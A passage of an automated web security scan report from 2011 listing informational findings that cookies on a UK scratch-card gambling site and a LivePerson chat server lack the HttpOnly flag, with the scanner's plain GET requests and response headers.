Date: Mon, 16 May 2011 12:25:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:25:41 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:41 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:25:41 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:41 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 12833

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...

12.169. http://scratch.co.uk/contact/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/contact/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:25:46 GMT; path=/
neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:46 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /contact/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:25:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:25:46 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:46 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:25:46 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:46 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 14828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...

12.170. http://scratch.co.uk/help/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/help/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:25:31 GMT; path=/
neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:31 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /help/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:25:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:25:31 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:31 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:25:31 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:31 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 11230

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...

12.171. http://scratch.co.uk/help/deposit/methods/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/help/deposit/methods/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:25:38 GMT; path=/
neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:38 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /help/deposit/methods/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:25:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:25:38 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:38 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:25:38 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:38 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 18477

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...

12.172. http://scratch.co.uk/help/fairplay/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/help/fairplay/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:25:33 GMT; path=/
neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:33 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /help/fairplay/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:25:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:25:33 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:33 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:25:33 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:33 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 12108

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...

12.173. http://scratch.co.uk/help/privacy/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/help/privacy/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:25:35 GMT; path=/
neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:35 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /help/privacy/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:25:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:25:35 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:35 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:25:35 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:35 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 16824

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...

12.174. http://scratch.co.uk/invite-friend/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/invite-friend/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:25:26 GMT; path=/
neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:26 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /invite-friend/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:25:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:25:26 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:26 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:25:26 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:26 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 14708

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...

12.175. http://scratch.co.uk/over-18/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/over-18/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:25:49 GMT; path=/
neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:49 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /over-18/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:25:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:25:49 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:49 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:25:49 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:49 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 10563

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...

12.176. http://scratch.co.uk/problem-gambling/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/problem-gambling/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:25:47 GMT; path=/
neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:47 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /problem-gambling/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:25:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:25:47 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:47 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:25:47 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:47 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 13706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...

12.177. http://scratch.co.uk/promotions/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/promotions/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:25:22 GMT; path=/
neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:22 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /promotions/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:25:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:25:22 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:22 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:25:22 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:22 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 13930

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...

12.178. http://scratch.co.uk/terms/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/terms/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:25:47 GMT; path=/
neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:47 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /terms/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:25:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:25:47 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:47 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:25:47 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:47 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45861

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...

12.179. http://scratch.co.uk/vis-club/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/vis-club/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:25:25 GMT; path=/
neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:25 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /vis-club/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:25:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:25:25 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:25 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:25:25 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:25 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 16044

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...

12.180. http://scratch.co.uk/winners/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/winners/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:25:39 GMT; path=/
neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:39 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /winners/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:25:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:25:39 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:39 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:25:39 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:39 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 28368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...

12.181. http://server.iad.liveperson.net/hc/15712222/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://server.iad.liveperson.net
Path:	/hc/15712222/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

HumanClickACTIVE=1305546148443; expires=Tue, 17-May-2011 11:42:28 GMT; path=/
HumanClickSiteContainerID_15712222=STANDALONE; path=/hc/15712222

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/15712222/?&site=15712222&cmd=mTagKnockPage&lpCallId=115274461452-278840988874&protV=20&lpjson=1&id=904552159&javaSupport=true&visitorStatus=INSITE_STATUS HTTP/1.1
Host: server.iad.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.scratch2cash.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=4711607244455630702; LivePersonID=-16101514677756-1305546140:-1:-1:-1:-1; HumanClickSiteContainerID_15712222=STANDALONE; LivePersonID=LP i=16101514677756,d=1305377522; HumanClickACTIVE=1305546146164

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:42:28 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
Set-Cookie: HumanClickACTIVE=1305546148443; expires=Tue, 17-May-2011 11:42:28 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Mon, 16 May 2011 11:42:28 GMT
Set-Cookie: HumanClickSiteContainerID_15712222=STANDALONE; path=/hc/15712222
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 1485

lpConnLib.Process({"ResultSet": {"lpCallId":"115274461452-278840988874","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'server.iad.liveper
...[SNIP]...

12.182. http://server.iad.liveperson.net/hc/15712222/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://server.iad.liveperson.net
Path:	/hc/15712222/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

HumanClickKEY=7569353171659657258; path=/hc/15712222
HumanClickACTIVE=1305546107605; expires=Tue, 17-May-2011 11:41:47 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/15712222/?&site=15712222&cmd=mTagKnockPage&lpCallId=148742555175-454874652903&protV=20&lpjson=1&id=2676596737&javaSupport=true&visitorStatus=INSITE_STATUS HTTP/1.1
Host: server.iad.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.mundirasca.com/Home.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
